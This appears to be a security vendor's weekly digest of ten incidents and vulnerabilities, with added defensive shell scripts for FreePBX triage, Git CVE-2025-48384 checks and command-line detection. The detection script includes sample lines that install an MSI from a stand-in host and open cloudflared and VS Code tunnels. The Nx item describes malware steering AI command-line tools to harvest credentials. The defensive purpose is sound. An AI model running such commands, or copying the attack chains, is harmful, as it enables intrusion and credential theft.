By security practitioners, for security practitioners

Weekly Top 10: 09.01.2025: Attackers Abuse Velociraptor IR Tool; npm ‘Nx’ Supply-Chain Attack Leaks ~20K Sensitive Files; TransUnion Breach Hits 4.4M People, and More.

WEEKLY TOP TEN: September 01, 2025, 16:00 GMT

  1. npm ‘Nx’ Supply-Chain Attack Leaks ~20K Sensitive Files

    Attackers compromised the popular Nx npm framework and seven plugins, pushing trojanized versions that installed a telemetry.js stealer. In just over four hours on August 26–27, more than 1,000 developers were infected, and roughly 20,000 sensitive files leaked publicly.

    The malware took advantage of AI command-line tools—Claude Code, Gemini, and Amazon Q—to search for tokens, SSH keys, cloud credentials, and crypto wallets, and then automatically created “s1ngularity” GitHub repositories in the victims’ accounts. GitHub disabled those repositories, but many stolen GitHub tokens remained active. Researchers at Socket and Wiz tracked the campaign and urged credential rotation.
  2. Ransomware Crew Gains Full Azure Control via Hybrid-Cloud Gaps

    Microsoft explains how Storm-0501 exploited hybrid identity gaps to seize the Global Administrator role in Entra ID and then escalated to Azure Owner across subscriptions from a hybrid-joined device. Using AzureHound reconnaissance, AzCopy, and storage-key theft, the group exfiltrated data, exposed private storage to the internet, mass-deleted backups, and leveraged cloud-native encryption—achieving cloud-based ransomware impact without endpoint lockers.

    The intrusion affected multiple Active Directory domains and Entra Connect Sync servers by exploiting a synced non-human identity that lacked MFA, allowing the attackers to reset passwords and register their own MFA. Microsoft warns Storm-0501 hunts unmanaged devices and hybrid-cloud misconfigurations, then uses cloud-native commands for discovery, escalation, exfiltration, deletion, and extortion.
  3. TransUnion Breach Hits 4.4M People

    TransUnion confirmed a breach affecting over 4.4 million U.S. individuals after attackers accessed data via a Salesforce account tied to consumer support operations. ShinyHunters and UNC6395 claimed responsibility, asserting 13 million records were stolen, including 4.4 million U.S. profiles.

    Names, billing addresses, phone numbers, email addresses, dates of birth, unredacted Social Security numbers, and support tickets and messages are among the exposed data. The breach occurred July 28 and was discovered July 30, per a Maine AG filing. TransUnion says credit reports weren’t exposed and is offering 24 months of identity protection. BleepingComputer links this incident to a broader Salesforce data-theft wave.
  4. FreePBX Zero-Day Actively Exploited

    Sangoma’s FreePBX team warns of an actively exploited zero-day targeting servers whose Administrator Control Panel is exposed to the internet. Exploitation began around August 21, leading to an emergency EDGE module fix for the Endpoint module, with a standard security release to follow.

    The fix protects new installs but will not clean compromised systems. Reported intrusions affected 3,000 SIP extensions and 500 trunks. Key indicators include missing or altered /etc/freepbx.conf, presence of /var/www/html/.clean.sh, Apache logs referencing modular.php, unusual calls to extension 9998, and unauthorized “ampuser” entries. Admins should isolate systems, restore from pre-August-21 backups, rotate credentials, and restrict ACP access.
  5. CISA &amp; Allies Publish Joint CSA on PRC APT Activity

    CISA, NSA, FBI, and international partners released a joint advisory on PRC-nexus APT actors compromising networks worldwide, especially in telecom, government, transportation, lodging, and defense. They target provider-edge and customer-edge routers with low visibility, modifying firmware and configurations to evade detection and maintain persistent access to feed espionage systems.

    Built from investigations through July 2025, the guidance emphasizes behavior over naming, noting overlaps with Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. Defenders are urged to hunt for router-level abuse and apply mitigations in the advisory. The alert highlights critical infrastructure risks and links to a full technical CSA for actions and detection.
  6. Hackers Exploit CrushFTP Zero-Day to Take Over Servers

    Researchers warn that hackers are actively exploiting a zero-day vulnerability in CrushFTP to take over servers. Tracked as CVE-2025-54309 and listed in CISA’s Known Exploited Vulnerabilities catalog, the flaw lets attackers execute their own code and upload arbitrary files, which they use to gain a foothold in networks.

    Discovery and the evidence of exploitation are credited to WatchTowr Labs; threat actors have since adopted the technique. Admins should update immediately, review access logs for suspicious uploads or admin actions, rotate credentials and keys, and isolate instances. Given CrushFTP’s widespread use across enterprises and government, exploitation poses serious risks of data theft, ransomware deployment, and lateral movement.
  7. CISA: Git RCE (CVE-2025-48384) Is Being Exploited

    CISA added Git CVE-2025-48384 to the Known Exploited Vulnerabilities catalog. The flaw stems from inconsistent handling of carriage return characters in configuration files, causing submodule path misresolution. Attackers can publish repositories with submodules ending in \r and a crafted symlink plus malicious hook to achieve arbitrary code execution on machines that clone them.

    Patches are available in Git 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. If updating isn’t possible, avoid recursive submodule clones from untrusted sources, disable hooks via core.hooksPath, and allow only audited submodules. Federal agencies face a September 15 deadline to patch or cease use immediately.
  8. WhatsApp Patches Zero-Click Exploit Targeting iOS and macOS Devices

    WhatsApp issued an emergency update for CVE-2025-55177, a zero-click flaw affecting iOS and macOS clients that stems from insufficient authorization of linked-device synchronization messages. The bug could let an unrelated user trigger processing of content from an arbitrary URL on a target device and was likely chained with Apple’s CVE-2025-43300 (ImageIO out-of-bounds write) in highly targeted spyware attacks.

    Patches landed in WhatsApp for iOS 2.25.21.73 (July 28) and WhatsApp Business/Mac 2.25.21.78 (August 4). WhatsApp sent in-app threat notifications to fewer than 200 users and advised factory resets and prompt updating. Organizations should verify versions and monitor for suspicious device-linking activity.
  9. Attackers Abuse Velociraptor IR Tool

    Sophos reports threat actors installed the open-source Velociraptor incident-response tool via msiexec from a Cloudflare Workers domain, then used it to fetch Visual Studio Code with tunneling enabled for command-and-control. The chain also deployed a Cloudflare tunnel and Radmin, living off legitimate tools to evade detections.

    At the same time, attackers pretended to be IT staff on Microsoft Teams to trick people into installing remote-access tools and PowerShell scripts to steal passwords and stay hidden—methods often used by ransomware groups. Security teams should watch for any unauthorized use of Velociraptor, as it may be an early warning sign of a ransomware attack. They should also check audit logs for tunneling and MSI installations, and prioritize IDE and EDR coverage along with user training.
  10. Deception in Depth: PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats

    Google Threat Intelligence details a PRC-nexus campaign, tracked as UNC6384, that hijacks captive-portal traffic to deliver a digitally signed STATICPLUGIN downloader masquerading as an Adobe plugin update. The chain downloads an MSI that side-loads CANONSTAGER, which decrypts and executes SOGU.SEC (PlugX) in memory.

    An adversary-in-the-middle on edge devices redirects browsers from gstatic connectivity checks to a malicious landing page, using valid TLS, social engineering, and code-signed binaries to blunt warnings and inspection. Google issued government-backed attacker alerts, added IOCs to Safe Browsing, and updated Security Operations hunts. The report also notes overlaps with TEMP.Hex/Mustang Panda and the group’s longstanding use of signed malware.
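For item 4 (FreePBX), the indicators the advisory lists can be checked mechanically. The POSIX shell script below is an added example, not Sangoma's code or the advisory's own tooling: every path is an argument, so the same checks run on a live host or on files copied from a forensic image, and the sample evidence it ships with is constructed. The Apache and Asterisk log locations, the log pattern for calls to extension 9998, and the `ampusers` query are assumptions to confirm against your own install.

```shell
#!/bin/sh
# Added example, not Sangoma's code: triage checks for the FreePBX indicators
# listed above. Every path is an argument, so the same checks run against files
# copied from a forensic image. Assumed rather than taken from the advisory:
# the Apache and Asterisk log locations and the log pattern for calls to
# extension 9998; adjust them for your distribution and dialplan.

# freepbx_indicators CONF CLEAN_SH APACHE_LOG ASTERISK_LOG REF_FILE
# Writes one line per indicator found to stderr and the total to stdout.
# REF_FILE is any file whose mtime marks the start of the exploitation
# window (for example: touch -t 202508210000 /tmp/ref).
freepbx_indicators() {
    conf="$1"; clean_sh="$2"; apache_log="$3"; asterisk_log="$4"; ref="$5"
    found=0
    if [ ! -s "$conf" ]; then
        echo "INDICATOR: $conf is missing or empty" >&2; found=$((found + 1))
    elif [ -n "$ref" ] && [ "$conf" -nt "$ref" ]; then
        echo "INDICATOR: $conf modified inside the exploitation window" >&2
        found=$((found + 1))
    fi
    if [ -e "$clean_sh" ]; then
        echo "INDICATOR: cleanup script present at $clean_sh" >&2; found=$((found + 1))
    fi
    if grep -q 'modular\.php' "$apache_log" 2>/dev/null; then
        echo "INDICATOR: requests for modular.php in $apache_log" >&2; found=$((found + 1))
    fi
    # Asterisk logs dialplan execution as "Executing [9998@context:1]"; the
    # pattern is an assumption, so confirm it against your own log format.
    if grep -Eq '\[9998@|Called 9998' "$asterisk_log" 2>/dev/null; then
        echo "INDICATOR: calls involving extension 9998 in $asterisk_log" >&2
        found=$((found + 1))
    fi
    echo "$found"
}

# unexpected_admins EXPECTED_FILE ACTUAL_FILE
# Prints admin usernames in ACTUAL_FILE (one per line) that are not in
# EXPECTED_FILE. ACTUAL_FILE can be produced with something like
#   mysql -N asterisk -e 'SELECT username FROM ampusers'
# (FreePBX's default database and table names; confirm on your version).
unexpected_admins() {
    grep -vxFf "$1" "$2" || true
}

# write_sample_evidence DIR
# Creates constructed (not real) files showing what a compromised host looks
# like: a config touched after 21 August, the cleanup script, and log hits.
write_sample_evidence() {
    d="$1"
    printf 'constructed config\n' > "$d/freepbx.conf"
    touch -t 202508210000 "$d/ref"
    touch -t 202508250000 "$d/freepbx.conf"
    : > "$d/.clean.sh"
    printf '10.0.0.5 - - [22/Aug/2025:03:14:07 +0000] "POST /admin/modular.php HTTP/1.1" 200 12\n' > "$d/access_log"
    printf '[2025-08-22 03:15:01] VERBOSE[1234] pbx.c: Executing [9998@from-internal:1] Dial("SIP/100-0001")\n' > "$d/full"
    printf 'admin\n' > "$d/expected_admins"
    printf 'admin\nampuser\n' > "$d/actual_admins"
}

# Stand-alone: `sh freepbx_triage.sh --live` checks the host's default paths;
# with no arguments it runs against the constructed sample.
if [ "${1:-}" = "--live" ]; then
    ref=$(mktemp); touch -t 202508210000 "$ref"
    freepbx_indicators /etc/freepbx.conf /var/www/html/.clean.sh \
        /var/log/httpd/access_log /var/log/asterisk/full "$ref"
    rm -f "$ref"
else
    d=$(mktemp -d); write_sample_evidence "$d"
    freepbx_indicators "$d/freepbx.conf" "$d/.clean.sh" "$d/access_log" "$d/full" "$d/ref"
    unexpected_admins "$d/expected_admins" "$d/actual_admins"
    rm -rf "$d"
fi
```

A non-zero count is a reason to isolate the box and restore from a pre-August-21 backup, as the advisory says; a zero count only means these particular indicators are absent, since the fix does not clean an already compromised system.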
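For item 7 (Git CVE-2025-48384), the patched-version list and the `core.hooksPath` workaround above translate directly into a check script. The following is an added example, not Git's or CISA's own tooling: it decides whether a `git --version` string is on or past a fixed release, points hooks at an empty directory until you can update, and audits a `.gitmodules` file for the carriage-return-terminated submodule paths the flaw depends on. The empty hooks directory path is a placeholder, and the sample `.gitmodules` is constructed.

```shell
#!/bin/sh
# Added example, not Git's or CISA's tooling: checks whether a Git version
# carries the fix for CVE-2025-48384 (from the patched releases listed above),
# applies the core.hooksPath workaround, and audits a .gitmodules file for
# submodule paths that end in a carriage return. Assumed: versions are plain
# MAJOR.MINOR.PATCH as `git --version` prints them, and the empty hooks
# directory path is a placeholder you may change.

# git_version_is_patched VERSION   (e.g. "2.43.7" or "git version 2.50.1")
# Returns 0 when VERSION is one of the fixed releases, a later patch on the
# same branch, or a newer branch.
git_version_is_patched() {
    v="${1#git version }"
    set -- $(printf '%s' "$v" | tr '.' ' ')   # split on dots
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    if [ "$major" -gt 2 ]; then return 0; fi
    if [ "$major" -lt 2 ]; then return 1; fi
    case "$minor" in
        43)       min=7 ;;
        44|45|46) min=4 ;;
        47)       min=3 ;;
        48)       min=2 ;;
        49|50)    min=1 ;;
        *) if [ "$minor" -gt 50 ]; then return 0; else return 1; fi ;;
    esac
    [ "$patch" -ge "$min" ]
}

# harden_git_hooks [DIR]
# Points core.hooksPath at an empty directory so a hook dropped into any
# repository's .git/hooks is never run. Only needed until git is updated.
harden_git_hooks() {
    dir="${1:-$HOME/.git-no-hooks}"   # placeholder path
    mkdir -p "$dir" && git config --global core.hooksPath "$dir"
}

# gitmodules_has_cr FILE
# Returns 0 and prints the offending lines when a submodule path in FILE ends
# with a carriage return, the shape this CVE abuses. A file converted to CRLF
# line endings will also trip this; treat that as something to look at too.
gitmodules_has_cr() {
    cr=$(printf '\r')
    grep -n "path *= *.*${cr}\$" "$1"
}

# write_sample_gitmodules FILE   (constructed, for demonstration)
write_sample_gitmodules() {
    printf '[submodule "lib"]\n\tpath = lib\r\n\turl = https://example.invalid/lib.git\n' > "$1"
}

# Stand-alone: `sh git_cve_check.sh --check` reports on the installed git and
# on the constructed sample.
if [ "${1:-}" = "--check" ]; then
    if git_version_is_patched "$(git --version)"; then
        echo "installed git is patched for CVE-2025-48384"
    else
        echo "installed git is NOT patched; run harden_git_hooks until you update"
    fi
    f=$(mktemp); write_sample_gitmodules "$f"
    gitmodules_has_cr "$f" && echo "sample .gitmodules has a CR-terminated path"
    rm -f "$f"
fi
```

Run `gitmodules_has_cr` against the `.gitmodules` of any repository you pull from an untrusted source before cloning it recursively; that is the "allow only audited submodules" step made concrete.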
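For item 9 (Velociraptor abuse), the detection advice is to look for unauthorized Velociraptor, MSI installs, and tunneling. The script below is an added example, not from Sophos' report: a first-pass filter over process-creation command lines exported one per line (for instance from Sysmon event ID 1 or EDR telemetry) that flags `msiexec` pulling a package from a URL, VS Code and `cloudflared` tunnels, and Velociraptor launched from anywhere other than your sanctioned install directory. The sample lines are constructed, the default install directory is an assumption, and the patterns are intentionally broad for tuning against your baseline.

```shell
#!/bin/sh
# Added example, not from Sophos' report: a first-pass filter over exported
# process-creation command lines (e.g. Sysmon event ID 1 or EDR telemetry
# exported one command line per line) for the tool misuse described above.
# The sample lines are constructed, not real telemetry, and the patterns are
# deliberately broad; tune them against your baseline before alerting on them.

# flag_suspicious_cmdlines FILE [VELOCIRAPTOR_DIR]
# Prints "<rule><TAB><command line>" for each line matching a rule.
# VELOCIRAPTOR_DIR is where your IR team legitimately runs Velociraptor from
# (assumed default below); any other invocation is flagged.
flag_suspicious_cmdlines() {
    file="$1"; vr_dir="${2:-C:\\Program Files\\Velociraptor}"
    vr_dir_lower=$(printf '%s' "$vr_dir" | tr 'A-Z' 'a-z')
    while IFS= read -r line; do
        lower=$(printf '%s' "$line" | tr 'A-Z' 'a-z')
        # msiexec installing a package straight from a URL
        case "$lower" in
            *msiexec*http://*|*msiexec*https://*)
                printf 'msiexec-remote-package\t%s\n' "$line" ;;
        esac
        # VS Code CLI tunnel, usable as a command-and-control channel
        case "$lower" in
            *code.exe*tunnel*|*"code tunnel"*)
                printf 'vscode-tunnel\t%s\n' "$line" ;;
        esac
        # cloudflared tunnel exposing the host through Cloudflare
        case "$lower" in
            *cloudflared*tunnel*)
                printf 'cloudflared-tunnel\t%s\n' "$line" ;;
        esac
        # Velociraptor run from anywhere other than the sanctioned install path
        case "$lower" in
            *"$vr_dir_lower"*) ;;
            *velociraptor*)
                printf 'velociraptor-unexpected-path\t%s\n' "$line" ;;
        esac
    done < "$file"
}

# write_sample_cmdlines FILE   (constructed lines, not real telemetry)
write_sample_cmdlines() {
    cat > "$1" <<'EOF'
C:\Windows\System32\msiexec.exe /i https://example-constructed.workers.dev/vr.msi /qn
"C:\Program Files\Velociraptor\velociraptor.exe" service run
C:\Users\Public\velociraptor.exe --config C:\Users\Public\client.config.yaml client
C:\Users\Public\vscode\code.exe tunnel --accept-server-license-terms
cloudflared.exe tunnel run --token PLACEHOLDER_TOKEN
C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt
EOF
}

# Stand-alone: `sh flag_cmdlines.sh export.txt`, or no arguments for the sample.
if [ "$#" -ge 1 ]; then
    flag_suspicious_cmdlines "$@"
else
    tmp=$(mktemp); write_sample_cmdlines "$tmp"
    flag_suspicious_cmdlines "$tmp"
    rm -f "$tmp"
fi
```

On the constructed sample this flags four of the six lines and leaves the Velociraptor service running from the sanctioned directory alone; the point is that a legitimate IR tool is only suspicious when it appears where your team did not put it.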

Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The top 10 stories above were selected from the 40+ original ones we determined to be most significant over the course of the week, ranked by highest risk, and using multiple sources when available.
